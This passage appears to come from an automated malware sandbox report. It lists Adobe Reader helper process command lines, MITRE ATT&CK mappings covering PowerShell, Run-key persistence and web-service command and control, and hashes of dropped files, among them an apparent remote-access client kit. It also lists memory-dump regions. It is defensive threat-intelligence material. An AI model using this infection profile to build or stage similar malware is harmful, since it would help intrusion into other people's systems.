      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=299A91C9F9ECD525CC4DBC58E58975A9 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=299A91C9F9ECD525CC4DBC58E58975A9 --renderer-client-id=2 --mojo-platform-channel-handle=1784 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:3644
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D86844620FECBE686E79171D2482E499 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:1148
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D8CBFF90D2EC00165F884839663695C7 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:2724
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=59D23AEE6ACCFB1DBEA77E181ECE51BF --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=59D23AEE6ACCFB1DBEA77E181ECE51BF --renderer-client-id=6 --mojo-platform-channel-handle=2316 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:3724
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=105BE7FF81EF69CC890FA6834CAC8A6D --mojo-platform-channel-handle=2692 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:428

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
36KB

MD5
b30d3becc8731792523d599d949e63f5

SHA1
19350257e42d7aee17fb3bf139a9d3adb330fad4

SHA256
b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

SHA512
523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
56KB

MD5
752a1f26b18748311b691c7d8fc20633

SHA1
c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

SHA256
111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

SHA512
a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

Download Submit
C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Filesize
64KB

MD5
b640a1fd35b6da291a82e50751297936

SHA1
bab11eb2681fb11bebad30352134197442d066da

SHA256
e983bfb52d4e8cb64382c29f91d7b4dbed12a9b471d0552f79b7e8e5fcda68e3

SHA512
d4924d4e5cb3d09ebd3a818e8a2a5df0cb6ae80d405e360f4b84d81d74585a0ab96c7a2c5e7f74d2664e4a882ca7fd8c863202170338dbc2ba96a34ed8801fda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
680407510c90ee4993405cc21a3a9e60

SHA1
befa482c34419dd4ed26a3e5467720143752a998

SHA256
1e55c92eca80e75e31ae4f09309267619014894229a4a3191ca74d4962cafff0

SHA512
b856c6d2c105f66e6bf9f42208b5a3f685899bfd379cafc9d9212ee6f87819e04a7593db8c3d25601b009b9d647c729df023ac4e239d09e8eb77d24eb9cf2d8c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
a12e9f958f6a2179ef9314b84678ffe1

SHA1
1abd9a2f8bd5df0f44fa227f1b39d85820882315

SHA256
9db7a2644d7c88acccf747f15f10f06a618c1691ed82fa6846f725a2a77e8ffe

SHA512
99e8cef0f508226a90db3434daa98a028c3ba71a70223095ffd4f13edb3e064fd9cf611c9d7146f573c0f92dde23df31309155836ed35b10a13ab031b909e6f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\78e2ff5b

Filesize
1.0MB

MD5
a5d846508854a7780fdfa5d6e3b4bec6

SHA1
2d39b673bd582973e7bd61f00b1b9ec00c420abf

SHA256
41c0d14d578a4b2ae282488a341e1aff4b2d514169b221616e0255fbfe5fe8a0

SHA512
638bccded205a48b149c62a2cd3a415f1ac502bb1f1cb68c129db9b402ce6bce5b5d77a01e77dd0d520d42c891fa3a58beca5836906f4787eef63d490deedfc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\bmrrr

Filesize
832KB

MD5
d78f6cce7dd76163e1af90c2287b7a04

SHA1
166e4715075b449fd6b9cde5ee06b66a2df050d2

SHA256
e48fe2b9bbffe143e8d9bf7f5559469de7edfc4b1a2185980379f3a74510e6e1

SHA512
741ea7ae677185b41b0a8fc05dfe250a09d3f90856e073b7713110509cec8bd0764e7333e4bf8527edd2dea8c006a00ffd8b9b53b41db169ac546eed19dad82f

Download Submit
C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\libvlc.dll

Filesize
186KB

MD5
4b262612db64f26ea1168ca569811110

SHA1
8e59964d1302a3109513cd4fd22c1f313e79654c

SHA256
a9340c99206f3388153d85df4ca94d33b28c60879406cc10ff1fd10eae16523f

SHA512
9902e64eb1e5ed4c67f4b7e523b41bde4535148c6be20db5f386a1da74533ca575383f1b3154f5985e379df9e1e164b6bda25a66504edcfaa57d40b04fc658c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\libvlccore.dll

Filesize
2.7MB

MD5
5bdff9dac8efdfedd169125e415a4111

SHA1
51bca77b201aa86b53735290c91bf4180cefe28e

SHA256
d5d609ce70c0459e07b7347f4a25d01e1526795d4c324034d4bbc9ac05d06ecd

SHA512
12aabb6ac23ea73d9625a3f61777f034951f333a30e17167d61c5a65d10acd2a83f392680d894ca941d20c84626f3257f3227c5f7f81c6d529b53edb0d8e4575

Download Submit
C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\ulgbkv

Filesize
46KB

MD5
8f37e80238556701210f07b7bbf91106

SHA1
b4593b7bd699bf461a568898e6b04f071476c8dd

SHA256
25a885ccdf9d1f231ef15d4abbf322513cd90ffa0699b553a64e73b0b70ca9e6

SHA512
df80ffa4625c7a35de4f577275c3794eca961cbd5ef0bd955a4a0cf662f783832ad6bc4496e8ebeb844d306d64dd0cf00f197ab419f9120bcfe804204b5be73e

Download Submit
C:\Users\Admin\AppData\Local\Temp\871dbc7a2ed62746e6998f48369f81dd\vlc.exe

Filesize
966KB

MD5
e634616d3b445fc1cd55ee79cf5326ea

SHA1
ca27a368d87bc776884322ca996f3b24e20645f4

SHA256
1fcd04fe1a3d519c7d585216b414cd947d16997d77d81a2892821f588c630937

SHA512
7d491c0a97ce60e22238a1a3530f45fbb3c82377b400d7986db09eccad05c9c22fb5daa2b4781882f870ab088326e5f6156613124caa67b54601cbad8f66aa90

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0qbxqo1y.exh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\eb6f13698dee2ec5fff6c81b8b88ab63.pdf

Filesize
51KB

MD5
acfffe6de49ab6bbcb590e95d558111b

SHA1
51d7b4a4ef2851f4787805bd2eebc61f9f62ae34

SHA256
fd0bc347f27e479b565d6095bfdc96ef2f42a7ae8649c40e1e702c8f16ab6217

SHA512
94fd4a2de31420576169b79c9617fb1eed4778fb50c17a9c8587b123169022e9338fe8d4b89bb5de5b06367eed6737e739423416c8be3f7f5f24b75b3b3ee28e

Download Submit
C:\Users\Admin\AppData\Roaming\TempControll\HTCTL32.DLL

Filesize
320KB

MD5
2d3b207c8a48148296156e5725426c7f

SHA1
ad464eb7cf5c19c8a443ab5b590440b32dbc618f

SHA256
edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796

SHA512
55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c

Download Submit
C:\Users\Admin\AppData\Roaming\TempControll\MSVCR100.dll

Filesize
755KB

MD5
0e37fbfa79d349d672456923ec5fbbe3

SHA1
4e880fc7625ccf8d9ca799d5b94ce2b1e7597335

SHA256
8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18

SHA512
2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

Download Submit
C:\Users\Admin\AppData\Roaming\TempControll\NSM.LIC

Filesize
253B

MD5
12b8cc1d0a34012bbbbe86880333c567

SHA1
e89659c412af82e31e6d14c34e47d7cc4c5ec9a5

SHA256
9c48ab2790281fca8d75abc805e6091f1b8133898852e6c09657d66f3dd0c48f

SHA512
eb44405dc70b40f15463c075f57b535b6e7c5132a34a99a62d663566ddc50b82f329c40880ab4a5425fe41077d5eec2c28baa500d3b27182ac5f104038ca00dc

Download Submit
C:\Users\Admin\AppData\Roaming\TempControll\PCICHEK.DLL

Filesize
18KB

MD5
a0b9388c5f18e27266a31f8c5765b263

SHA1
906f7e94f841d464d4da144f7c858fa2160e36db

SHA256
313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a

SHA512
6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd

Download Submit
C:\Users\Admin\AppData\Roaming\TempControll\PCICL32.dll

Filesize
3.5MB

MD5
d16ffa06a35601a73b73836bf905ed19

SHA1
b8231d36f921e5b75b592ea3374f19216a5c411f

SHA256
80cc439a0633add1dd964bb6bb40ccdcfec3ae28da39fd9416642ab0605d40ab

SHA512
e79b8cfbdd4d86742420a334ab6e0d70bcd3393ab8b07ae6d49ec435aef2bcbd07681774ac7e66eca41c11aa086b398440f74f0b1b77087aa2c18b76c6f3a168

Download Submit
C:\Users\Admin\AppData\Roaming\TempControll\client32.exe

Filesize
33KB

MD5
290c26b1579fd3e48d60181a2d22a287

SHA1
e4c91a7f161783c68cf67250206047f23bd25a29

SHA256
973836529b57815903444dd5d4b764e8730986b1bd87179552f249062ee26128

SHA512
114a9f068b36a1edf5cce9269057f0cc17b22a10cd73cbed3ef42ae71324e41363e543a3af8be57b410c533b62bcf7f28650b464cce96e0e6c14819cdb90129a

Download Submit
C:\Users\Admin\AppData\Roaming\TempControll\client32.ini

Filesize
733B

MD5
0cdedc9a0a1ee8c9f7ca140e543f2f1c

SHA1
2540f9e3c63b6174a60324b137ffb5697c1a7df8

SHA256
3e63adc8fd536f6045c8ffde42649350f13df7b7d2f7f988f4bfb0591bf9afb6

SHA512
068deac28541fb62792f49a3e368ea9949e3dba93f6c23a942d28e0d9ae87e3bb25a878a9d777a2ec2dc4b918fc0a357f7ce7534c22c62128f2fe2a7c7a14ae2

Download Submit
C:\Users\Admin\AppData\Roaming\TempControll\pcicapi.dll

Filesize
32KB

MD5
dcde2248d19c778a41aa165866dd52d0

SHA1
7ec84be84fe23f0b0093b647538737e1f19ebb03

SHA256
9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917

SHA512
c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166

Download Submit
memory/1292-0-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/1376-263-0x00007FF7B4780000-0x00007FF7B4878000-memory.dmp

Filesize
992KB

Download
memory/1376-264-0x00007FFA0DCF0000-0x00007FFA0DD24000-memory.dmp

Filesize
208KB

Download
memory/1376-240-0x00007FF9FEB10000-0x00007FF9FEC82000-memory.dmp

Filesize
1.4MB

Download
memory/1376-265-0x00007FF9FEE80000-0x00007FF9FF135000-memory.dmp

Filesize
2.7MB

Download
memory/1424-229-0x00000000050E0000-0x0000000005708000-memory.dmp

Filesize
6.2MB

Download
memory/1424-221-0x00000000049C0000-0x00000000049F6000-memory.dmp

Filesize
216KB

Download
memory/1652-601-0x0000000009B00000-0x0000000009C4D000-memory.dmp

Filesize
1.3MB

Download
memory/2052-90-0x0000000003290000-0x0000000003298000-memory.dmp

Filesize
32KB

Download
memory/2052-180-0x0000000003348000-0x0000000003350000-memory.dmp

Filesize
32KB

Download
memory/2052-74-0x0000000003228000-0x0000000003230000-memory.dmp

Filesize
32KB

Download
memory/2052-82-0x0000000003280000-0x0000000003288000-memory.dmp

Filesize
32KB

Download
memory/2052-86-0x0000000003288000-0x0000000003290000-memory.dmp

Filesize
32KB

Download
memory/2052-85-0x0000000003238000-0x0000000003240000-memory.dmp

Filesize
32KB

Download
memory/2052-89-0x0000000003240000-0x0000000003248000-memory.dmp

Filesize
32KB

Download
memory/2052-76-0x0000000003278000-0x0000000003280000-memory.dmp

Filesize
32KB

Download
memory/2052-94-0x0000000003298000-0x00000000032A0000-memory.dmp

Filesize
32KB

Download
memory/2052-93-0x0000000003248000-0x0000000003250000-memory.dmp

Filesize
32KB

Download
memory/2052-96-0x0000000003250000-0x0000000003258000-memory.dmp

Filesize
32KB

Download
memory/2052-97-0x00000000032A0000-0x00000000032A8000-memory.dmp

Filesize
32KB

Download
memory/2052-102-0x00000000032A8000-0x00000000032B0000-memory.dmp

Filesize
32KB

Download
memory/2052-101-0x0000000003258000-0x0000000003260000-memory.dmp

Filesize
32KB

Download
memory/2052-105-0x00000000032B0000-0x00000000032B8000-memory.dmp

Filesize
32KB

Download
memory/2052-104-0x0000000003260000-0x0000000003268000-memory.dmp

Filesize
32KB

Download
memory/2052-108-0x00000000032B8000-0x00000000032C0000-memory.dmp

Filesize
32KB

Download
memory/2052-107-0x0000000003268000-0x0000000003270000-memory.dmp

Filesize
32KB

Download
memory/2052-112-0x00000000032C0000-0x00000000032C8000-memory.dmp

Filesize
32KB

Download
memory/2052-111-0x0000000003270000-0x0000000003278000-memory.dmp

Filesize
32KB

Download
memory/2052-115-0x0000000001610000-0x0000000001611000-memory.dmp

Filesize
4KB

Download
memory/2052-119-0x00000000032C8000-0x00000000032D0000-memory.dmp

Filesize
32KB

Download
memory/2052-118-0x0000000003278000-0x0000000003280000-memory.dmp

Filesize
32KB

Download
memory/2052-122-0x00000000032D0000-0x00000000032D8000-memory.dmp

Filesize
32KB

Download
memory/2052-121-0x0000000003280000-0x0000000003288000-memory.dmp

Filesize
32KB

Download
memory/2052-123-0x0000000001610000-0x0000000001611000-memory.dmp

Filesize
4KB

Download
memory/2052-126-0x00000000032D8000-0x00000000032E0000-memory.dmp

Filesize
32KB

Download
memory/2052-125-0x0000000003288000-0x0000000003290000-memory.dmp

Filesize
32KB

Download
memory/2052-130-0x00000000032E0000-0x00000000032E8000-memory.dmp

Filesize
32KB

Download
memory/2052-129-0x0000000003290000-0x0000000003298000-memory.dmp

Filesize
32KB

Download
memory/2052-136-0x00000000032A0000-0x00000000032A8000-memory.dmp

Filesize
32KB

Download
memory/2052-135-0x00000000032E8000-0x00000000032F0000-memory.dmp

Filesize
32KB

Download
memory/2052-134-0x00000000032F0000-0x00000000032F8000-memory.dmp

Filesize
32KB

Download
memory/2052-133-0x0000000003298000-0x00000000032A0000-memory.dmp

Filesize
32KB

Download
memory/2052-143-0x00000000032B0000-0x00000000032B8000-memory.dmp

Filesize
32KB

Download
memory/2052-142-0x0000000003300000-0x0000000003308000-memory.dmp

Filesize
32KB

Download
memory/2052-141-0x00000000032F8000-0x0000000003300000-memory.dmp

Filesize
32KB

Download
memory/2052-140-0x00000000032A8000-0x00000000032B0000-memory.dmp

Filesize
32KB

Download
memory/2052-147-0x0000000003308000-0x0000000003310000-memory.dmp

Filesize
32KB

Download
memory/2052-146-0x00000000032B8000-0x00000000032C0000-memory.dmp

Filesize
32KB

Download
memory/2052-150-0x0000000003310000-0x0000000003318000-memory.dmp

Filesize
32KB

Download
memory/2052-149-0x00000000032C0000-0x00000000032C8000-memory.dmp

Filesize
32KB

Download
memory/2052-152-0x0000000001610000-0x0000000001611000-memory.dmp

Filesize
4KB

Download
memory/2052-155-0x0000000003318000-0x0000000003320000-memory.dmp

Filesize
32KB

Download
memory/2052-153-0x0000000001610000-0x0000000001611000-memory.dmp

Filesize
4KB

Download
memory/2052-154-0x00000000032C8000-0x00000000032D0000-memory.dmp

Filesize
32KB

Download
memory/2052-157-0x00000000032D0000-0x00000000032D8000-memory.dmp

Filesize
32KB

Download
memory/2052-158-0x0000000003320000-0x0000000003328000-memory.dmp

Filesize
32KB

Download
memory/2052-163-0x0000000003328000-0x0000000003330000-memory.dmp

Filesize
32KB

Download
memory/2052-162-0x00000000032D8000-0x00000000032E0000-memory.dmp

Filesize
32KB

Download
memory/2052-169-0x0000000003330000-0x0000000003338000-memory.dmp

Filesize
32KB

Download
memory/2052-168-0x00000000032E0000-0x00000000032E8000-memory.dmp

Filesize
32KB

Download
memory/2052-174-0x0000000003338000-0x0000000003340000-memory.dmp

Filesize
32KB

Download
memory/2052-173-0x00000000032E8000-0x00000000032F0000-memory.dmp

Filesize
32KB

Download
memory/2052-172-0x00000000032F0000-0x00000000032F8000-memory.dmp

Filesize
32KB

Download
memory/2052-176-0x0000000003340000-0x0000000003348000-memory.dmp

Filesize
32KB

Download
memory/2052-179-0x0000000003300000-0x0000000003308000-memory.dmp

Filesize
32KB

Download
memory/2052-75-0x0000000003230000-0x0000000003238000-memory.dmp

Filesize
32KB

Download
memory/2052-178-0x00000000032F8000-0x0000000003300000-memory.dmp

Filesize
32KB

Download
memory/2052-182-0x0000000003350000-0x0000000003358000-memory.dmp

Filesize
32KB

Download
memory/2052-185-0x0000000003308000-0x0000000003310000-memory.dmp

Filesize
32KB

Download
memory/2052-186-0x0000000003358000-0x0000000003360000-memory.dmp

Filesize
32KB

Download
memory/2052-189-0x0000000003360000-0x0000000003368000-memory.dmp

Filesize
32KB

Download
memory/2052-188-0x0000000003310000-0x0000000003318000-memory.dmp

Filesize
32KB

Download
memory/2052-192-0x0000000003368000-0x0000000003370000-memory.dmp

Filesize
32KB

Download
memory/2052-191-0x0000000003318000-0x0000000003320000-memory.dmp

Filesize
32KB

Download
memory/2052-195-0x0000000003370000-0x0000000003378000-memory.dmp

Filesize
32KB

Download
memory/2052-194-0x0000000003320000-0x0000000003328000-memory.dmp

Filesize
32KB

Download
memory/2052-198-0x0000000001610000-0x0000000001611000-memory.dmp

Filesize
4KB

Download
memory/2052-201-0x0000000003328000-0x0000000003330000-memory.dmp

Filesize
32KB

Download
memory/2052-204-0x0000000003330000-0x0000000003338000-memory.dmp

Filesize
32KB

Download
memory/2052-205-0x0000000003338000-0x0000000003340000-memory.dmp

Filesize
32KB

Download
memory/2052-207-0x0000000003340000-0x0000000003348000-memory.dmp

Filesize
32KB

Download
memory/2052-70-0x0000000003220000-0x0000000003228000-memory.dmp

Filesize
32KB

Download
memory/2052-71-0x0000000003270000-0x0000000003278000-memory.dmp

Filesize
32KB

Download
memory/2052-67-0x0000000003268000-0x0000000003270000-memory.dmp

Filesize
32KB

Download
memory/2052-62-0x0000000003210000-0x0000000003218000-memory.dmp

Filesize
32KB

Download
memory/2052-63-0x00000000031A8000-0x00000000031B0000-memory.dmp

Filesize
32KB

Download
memory/2052-64-0x0000000003218000-0x0000000003220000-memory.dmp

Filesize
32KB

Download
memory/2052-65-0x0000000003260000-0x0000000003268000-memory.dmp

Filesize
32KB

Download
memory/2052-61-0x0000000001610000-0x0000000001611000-memory.dmp

Filesize
4KB

Download
memory/2052-243-0x0000000001610000-0x0000000001611000-memory.dmp

Filesize
4KB

Download
memory/2052-58-0x0000000003258000-0x0000000003260000-memory.dmp

Filesize
32KB

Download
memory/2052-57-0x00000000031C0000-0x00000000031C8000-memory.dmp

Filesize
32KB

Download
memory/2052-53-0x00000000031B8000-0x00000000031C0000-memory.dmp

Filesize
32KB

Download
memory/2052-54-0x0000000003250000-0x0000000003258000-memory.dmp

Filesize
32KB

Download
memory/2052-3-0x0000000003170000-0x0000000003198000-memory.dmp

Filesize
160KB

Download
memory/2052-49-0x0000000003170000-0x0000000003198000-memory.dmp

Filesize
160KB

Download
memory/2052-279-0x0000000001610000-0x0000000001611000-memory.dmp

Filesize
4KB

Download
memory/2052-283-0x0000000001610000-0x0000000001611000-memory.dmp

Filesize
4KB

Download
memory/2052-284-0x0000000001610000-0x0000000001611000-memory.dmp

Filesize
4KB

Download
memory/2052-10-0x00000000031B8000-0x00000000031C0000-memory.dmp

Filesize
32KB

Download
memory/2052-13-0x00000000031C0000-0x00000000031C8000-memory.dmp

Filesize
32KB

Download
memory/2052-34-0x0000000003218000-0x0000000003220000-memory.dmp

Filesize
32KB

Download
memory/2052-50-0x0000000003248000-0x0000000003250000-memory.dmp

Filesize
32KB

Download
memory/2052-33-0x0000000003208000-0x0000000003210000-memory.dmp

Filesize
32KB

Download
memory/2052-32-0x00000000031B0000-0x00000000031B8000-memory.dmp

Filesize
32KB

Download
memory/2052-46-0x0000000003240000-0x0000000003248000-memory.dmp

Filesize
32KB

Download
